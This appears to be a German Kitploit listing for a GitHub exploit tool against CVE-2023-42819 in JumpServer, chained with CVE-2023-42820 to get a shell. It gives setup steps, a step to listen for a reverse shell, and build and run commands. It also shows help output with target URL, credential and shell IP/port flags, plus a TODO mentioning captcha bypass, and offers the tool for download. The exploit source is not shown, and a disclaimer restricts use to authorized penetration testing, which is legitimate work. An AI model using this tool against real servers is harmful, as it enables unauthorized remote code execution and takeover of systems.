Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-42819 — CVE-2023-42819 | Kitploit
Tools/GitHubGitHub/c1ph3rx13/cve-2023-42819
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstests
GitHubc1ph3rx13/cve-2023-42819

CVE-2023-42819

CVE-2023-42819

Repository anzeigen
63vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-42819

CVE-2023-42819

Schwachstellenbeschreibung

JumpServer Schwachstelle zum Schreiben beliebiger Dateien

CVE-2023-42819 + CVE-2023-42820 = GetShell

USAGE

  1. Legen Sie das Skript und die erforderlichen Dateien in dasselbe Verzeichnis.

  2. Stellen Sie sicher, dass Google Chrome installiert ist, und ermitteln Sie die Versionsnummer von Google Chrome.

root@kitploit:~
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
  1. Laden Sie entsprechend der Google Chrome-Version und des Systems den chromedriver herunter und platzieren Sie ihn im webdriver-Verzeichnis.

    Neueste Version: https://googlechromelabs.github.io/chrome-for-testing/

    Historische Versionen: https://chromedriver.chromium.org/downloads/version-selection

    So viele Anforderungen : (

  2. Hören Sie auf der entsprechenden IP und Port und warten Sie auf eine Reverse Shell.

Python-Version

root@kitploit:~
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: Der Code dient nur zu Lernzwecken, bitte nicht für andere Zwecke verwenden.

usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]

CVE-2023-42819 by C1ph3rX13.

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target url
  -u USERNAME, --username USERNAME
                        account username
  -p PASSWORD, --password PASSWORD
                        account password
  --ip IP               shell ip
  --port PORT           shell port
  --proxy PROXY         proxy to http://ip:port

image-1

image-1

Go Version

Build

root@kitploit:~
go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath

Run

root@kitploit:~
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
             

        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗  
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝  
                                                                                                                
    @Auth: C1ph3rX13                                                                                            
    @Blog: https://c1ph3rx13.github.io                                                                          
    @Note: Der Code dient nur zu Lernzwecken, bitte nicht für andere Zwecke verwenden.                                                                   

Usage of CVE-2023-42819.exe:
  -ip string                                                                  
        Shell IP
  -p string
        Account Password
  -port string
        Shell Port
  -proxy string
        Proxy Url
  -t string
        Target Url
  -u string
        Account Username

image-1

TODO

  • Die Art und Weise der Cross-Origin-Behebung ist nicht elegant genug
  • Mit httpx neu geschrieben
  • EXP-Funktion hinzugefügt
  • Mit go-resty neu geschrieben
  • Anmeldung mit falschem Passwort führt zu Captcha-Umgehung
  • Reverse-Shell-Typen hinzugefügt
  • Headless-Modus für Linux-Kompatibilität
  • Proxy http, https, socks hinzugefügt
  • CVE-2023-42819 + CVE-2023-42820 Ein-Klick-GetShell
  • So viele Flags aufgestellt, vielleicht schaffe ich es nicht : (

Wartung

  • 2023-10-18 Automatisierte Website-Erkennungsumgehung hinzugefügt - Python Version
  • 2023-10-18 Client-Funktionen umstrukturiert
  • 2023-10-18 Ausführungslogik vereinfacht
  • 2023-10-18 Linux-Test OK - Go Version

Haftungsausschluss

  1. Dieses Tool richtet sich ausschließlich an Sicherheitspersonal für Penetrationstests mit rechtmäßiger Autorisierung und an Netzwerkadministratoren, die Routineaufgaben durchführen. Benutzer dürfen es unter der Bedingung einer ausreichenden rechtmäßigen Autorisierung und nichtkommerziellen Nutzung herunterladen, kopieren, verbreiten oder verwenden.

  2. Bei der Nutzung dieses Tools müssen Sie sicherstellen, dass alle Ihre Handlungen den örtlichen Gesetzen und Vorschriften entsprechen, und dieses Tool nicht für Aktivitäten verwenden, die gegen die Gesetze der Volksrepublik China verstoßen. Alle Autoren und Mitwirkenden dieses Tools übernehmen keine Haftung für rechtswidrige Aktivitäten, die durch die unbefugte Nutzung dieses Tools durch Benutzer entstehen.

Tool herunterladen